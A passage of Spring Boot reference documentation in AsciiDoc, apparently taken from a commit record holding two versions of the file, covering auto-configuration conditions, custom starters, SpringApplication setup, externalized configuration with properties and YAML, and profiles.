`@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations\non auto-configuration classes (since these are guaranteed to load after any user-define\nbeans definitions have been added).\n\nNOTE: `@ConditionalOnBean` and `@ConditionalOnMissingBean` do not prevent `@Configuration`\nclasses from being created. Using these conditions at the class level is equivalent to\nmarking each contained `@Bean` method with the annotation.\n\n\n\n[[boot-features-property-conditions]]\n==== Property conditions\nThe `@ConditionalOnProperty` annotation allows configuration to be included based on a\nSpring Environment property. Use the `prefix` and `name` attributes to specify the\nproperty that should be checked. By default any property that exists and is not equal to\n`false` will be matched. You can also create more advanced checks using the `havingValue`\nand `matchIfMissing` attributes.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web application conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be included depending on whether the application is a 'web\napplication'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be included based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-custom-starter]]\n=== Creating your own starter\nA full Spring Boot starter for a library may contain the following components:\n\n* The `autoconfigure` module that contains the auto-configuration code.\n* The `starter` module that provides a dependency to the autoconfigure module as well as\n the library and any additional dependencies that are typically useful. In a nutshell,\n adding the starter should be enough to start using that library.\n\nTIP: You may combine the auto-configuration code and the dependency management in a single\nmodule if you don't need to separate those two concerns.\n\n\n\n[[boot-features-custom-starter-naming]]\n==== Naming\nPlease make sure to provide a proper namespace for your starter. Do not start your module\nnames with `spring-boot`, even if you are using a different Maven groupId. We may offer an\nofficial support for the thing you're auto-configuring in the future.\n\nHere is a rule of thumb. Let's assume that you are creating a starter for \"acme\", name the\nauto-configure module `acme-spring-boot-autoconfigure` and the starter\n`acme-spring-boot-starter`. If you only have one module combining the two, use\n`acme-spring-boot-starter`.\n\nBesides, if your starter provides configuration keys, use a proper namespace for them. In\nparticular, do not include your keys in the namespaces that Spring Boot uses (e.g.\n`server`, `management`, `spring`, etc). These are \"ours\" and we may improve\/modify them\nin the future in such a way it could break your things.\n\nMake sure to\n<<appendix-configuration-metadata#configuration-metadata-annotation-processor,trigger\nmeta-data generation>> so that IDE assistance is available for your keys as well. You\nmay want to review the generated meta-data (`META-INF\/spring-configuration-metadata.json`)\nto make sure your keys are properly documented.\n\n\n\n[[boot-features-custom-starter-module-autoconfigure]]\n==== Autoconfigure module\nThe autoconfigure module contains everything that is necessary to get started with the\nlibrary. It may also contain configuration keys definition (`@ConfigurationProperties`)\nand any callback interface that can be used to further customize how the components are\ninitialized.\n\nTIP: You should mark the dependencies to the library as optional so that you can include\nthe autoconfigure module in your projects more easily. If you do it that way, the library\nwon't be provided and Spring Boot will backoff by default.\n\n\n\n[[boot-features-custom-starter-module-starter]]\n==== Starter module\nThe starter is an empty jar, really. Its only purpose is to provide the necessary\ndependencies to work with the library; see it as an opinionated view of what is required\nto get started.\n\nDo not make assumptions about the project in which your starter is added. If the library\nyou are auto-configuring typically requires other starters, mention them as well. Providing\na proper set of _default_ dependencies may be hard if the number of optional dependencies\nis high as you should avoid bringing unnecessary dependencies for a typical usage of the\nlibrary.\n\n\n\n[[boot-features-websockets]]\n== WebSockets\nSpring Boot provides WebSockets auto-configuration for embedded Tomcat (8 and 7), Jetty 9\nand Undertow. If you're deploying a war file to a standalone container, Spring Boot\nassumes that the container will be responsible for the configuration of its WebSocket\nsupport.\n\nSpring Framework provides {spring-reference}\/#websocket[rich WebSocket support] that can\nbe easily accessed via the `spring-boot-starter-websocket` module.\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the _<<getting-started.adoc#getting-started>>_ and\n_<<using-spring-boot.adoc#using-boot>>_ sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.charset` (default is `UTF-8`).\n\nYou can use the following variables inside your `banner.txt` file:\n\n.Banner variables\n|===\n| Variable | Description\n\n|`${application.version}`\n|The version number of your application as declared in `MANIFEST.MF`. For example `Implementation-Version: 1.0` is printed as `1.0`.\n\n|`${application.formatted-version}`\n|The version number of your application as declared in `MANIFEST.MF` formatted for\ndisplay (surrounded with brackets and prefixed with `v`). For example `(v1.0)`.\n\n|`${spring-boot.version}`\n|The Spring Boot version that you are using. For example `{spring-boot-version}`.\n\n|`${spring-boot.formatted-version}`\n|The Spring Boot version that you are using formatted for display (surrounded with\nbrackets and prefixed with `v`). For example `(v{spring-boot-version})`.\n\n|`${Ansi.NAME}` (or `${AnsiColor.NAME}`, `${AnsiBackground.NAME}`, `${AnsiStyle.NAME}`)\n|Where `NAME` is the name of an ANSI escape code. See\n{sc-spring-boot}\/ansi\/AnsiPropertySource.{sc-ext}[`AnsiPropertySource`] for details.\n|===\n\nTIP: The `SpringBootApplication.setBanner(...)` method can be used if you want to generate\na banner programmatically. Use the `org.springframework.boot.Banner` interface and\nimplement your own `printBanner()` method.\n\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setBannerMode(Banner.Mode.OFF);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See _<<boot-features-external-config>>_ for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder`\nJavadoc] for full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationReadyEvent` is sent after the refresh and any related callbacks have\n been processed to indicate the application is ready to service requests.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using\n`SpringApplication` within a JUnit test.\n\n\n\n[[boot-features-application-arguments]]\n=== Accessing application arguments\nIf you need to access the application arguments that were passed to\n`SpringApplication.run(...)` you can inject a\n`org.springframework.boot.ApplicationArguments` bean. The `ApplicationArguments` interface\nprovides access to both the raw `String[]` arguments as well as parsed `option` and\n`non-option` arguments:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.beans.factory.annotation.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Autowired\n\t\tpublic MyBean(ApplicationArguments args) {\n\t\t\tboolean debug = args.containsOption(\"debug\");\n\t\t\tList<String> files = args.getNonOptionArgs();\n\t\t\t\/\/ if run with \"--debug logfile.txt\" debug=true, files=[\"logfile.txt\"]\n\t\t}\n\n\t}\n----\n\nTIP: Spring Boot will also register a `CommandLinePropertySource` with the Spring\n`Environment`. This allows you to also inject single application arguments using the\n`@Value` annotation.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the ApplicationRunner or CommandLineRunner\nIf you need to run some specific code once the `SpringApplication` has started, you can\nimplement the `ApplicationRunner` or `CommandLineRunner` interfaces. Both interfaces work\nin the same way and offer a single `run` method which will be called just before\n`SpringApplication.run(...)` completes.\n\nThe `CommandLineRunner` interfaces provides access to application arguments as a simple\nstring array, whereas the `ApplicationRunner` uses the `ApplicationArguments` interface\ndiscussed above.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner` or\n`ApplicationRunner` beans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-application-admin]]\n=== Admin features\nIt is possible to enable admin-related features for the application by specifying the\n`spring.application.admin.enabled` property. This exposes the\n{sc-spring-boot}\/admin\/SpringApplicationAdminMXBean.{sc-ext}[`SpringApplicationAdminMXBean`]\non the platform `MBeanServer`. You could use this feature to administer your Spring Boot\napplication remotely. This could also be useful for any service wrapper implementation.\n\nTIP: If you want to know on which HTTP port the application is running, get the property\nwith key `local.server.port`.\n\nNOTE: Take care when enabling this feature as the MBean exposes a method to shutdown the\napplication.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or\n<<boot-features-external-config-typesafe-configuration-properties,bound to structured objects>>\nvia `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the following order:\n\n. Command line arguments.\n. JNDI attributes from `java:comp\/env`.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> outside of your packaged jar\n (`application-{profile}.properties` and YAML variants)\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> packaged inside your jar (`application-{profile}.properties`\n and YAML variants)\n. Application properties outside of your packaged jar (`application.properties` and YAML\n variants).\n. Application properties packaged inside your jar (`application.properties` and YAML\n variants).\n. {spring-javadoc}\/context\/annotation\/PropertySource.{dc-ext}[`@PropertySource`] annotations\n on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\n\n\n[[boot-features-external-config-random-values]]\n=== Configuring random values\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (properties defined in locations higher in the list\noverride those defined in lower locations).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile-specific properties\nIn addition to `application.properties` files, profile-specific properties can also be\ndefined using the naming convention `application-{profile}.properties`. The\n`Environment` has a set of default profiles (by default `[default]`) which are\nused if no active profiles are set (i.e. if no profiles are explicitly activated\nthen properties from `application-default.properties` are loaded).\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files always overriding the non-specific\nones irrespective of whether the profile-specific files are inside or outside your\npackaged jar.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the _<<howto.adoc#howto-use-short-command-line-arguments>>_ how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/www.snakeyaml.org\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` will load YAML as `Properties` and the\n`YamlMapFactoryBean` will load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\nThe default profiles are activated if none are explicitly active when the application\ncontext starts. So in this YAML we set a value for `security.user.password` that is\n*only* available in the \"default\" profile:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 80000\n\t---\n\tspring:\n\t profiles: default\n\tsecurity:\n\t user:\n\t password: weak\n----\n\nwhereas in this example, the password is always set because it isn't attached to any\nprofile, and it would have to be explicitly reset in all other profiles as necessary:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 80000\n\tsecurity:\n\t user:\n\t password: weak\n----\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nNOTE: The getters and setters are advisable, since binding is via standard Java Beans\nproperty descriptors, just like in Spring MVC. They are mandatory for immutable types or\nthose that are directly coercible from `String`. As long as they are initialized, maps,\ncollections, and arrays need a getter but not necessarily a setter since they can be\nmutated by the binder. If there is a setter, Maps, collections, and arrays can be created.\nMaps and collections can be expanded with only a getter, whereas arrays require a setter.\nNested POJO properties can also be created (so a setter is not mandatory) if they have a\ndefault constructor, or a constructor accepting a single value that can be coerced from\nString. Some people use Project Lombok to add getters and setters automatically.\n\nThe `@EnableConfigurationProperties` annotation is automatically applied to your project\nso that any beans annotated with `@ConfigurationProperties` will be configured from the\n`Environment` properties. This style of configuration works particularly well with the\n`SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\nTIP: Using `@ConfigurationProperties` also allows you to generate meta-data files that can\nbe used by IDEs. See the <<configuration-metadata>> appendix for details.\n\n\n\n[[boot-features-external-config-3rd-party-configuration]]\n==== Third-party configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it\non `@Bean` methods. This can be particularly useful when you want to bind properties to\nthird-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to\nits bean registration:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix = \"foo\")\n\t@Bean\n\tpublic FooComponent fooComponent() {\n\t\t...\n\t}\n----\n\nAny property defined with the `foo` prefix will be mapped onto that `FooComponent` bean\nin a similar manner as the `ConnectionSettings` example above.\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include dashed separated (e.g. `context-path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nFor example, given the following `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"person\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String firstName;\n\n\t\tpublic String getFirstName() {\n\t\t\treturn this.firstName;\n\t\t}\n\n\t\tpublic void setFirstName(String firstName) {\n\t\t\tthis.firstName = firstName;\n\t\t}\n\n\t}\n----\n\nThe following properties names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n|`person.firstName`\n|Standard camel case syntax.\n\n|`person.first-name`\n|Dashed notation, recommended for use in `.properties` and `.yml` files.\n\n|`PERSON_FIRST_NAME`\n|Upper case format. Recommended when using a system environment variables.\n|===\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean) or custom `Converters` (with\nbean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to\nlimit the dependencies your `ConversionService` is using. Typically, any dependency that\nyou'd require may not be fully initialized at creation time. You may want to rename your\ncustom `ConversionService` if it's not required for configuration keys coercion.\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nIn order to validate values of nested properties, you must annotate the associated field\nas `@Valid` to trigger its validation. For example, building upon the above\n`ConnectionSettings` example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\t@Valid\n\t\tprivate RemoteAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t\tprivate static class RemoteAddress {\n\n\t\t\t@NotEmpty\n\t\t\tpublic String hostname;\n\n\t\t\t\/\/ ... getters and setters\n\n\t\t}\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`. There is a\n{github-code}\/spring-boot-samples\/spring-boot-sample-property-validation[Validation sample]\nso you can see how to set things up.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n_<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>_.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto 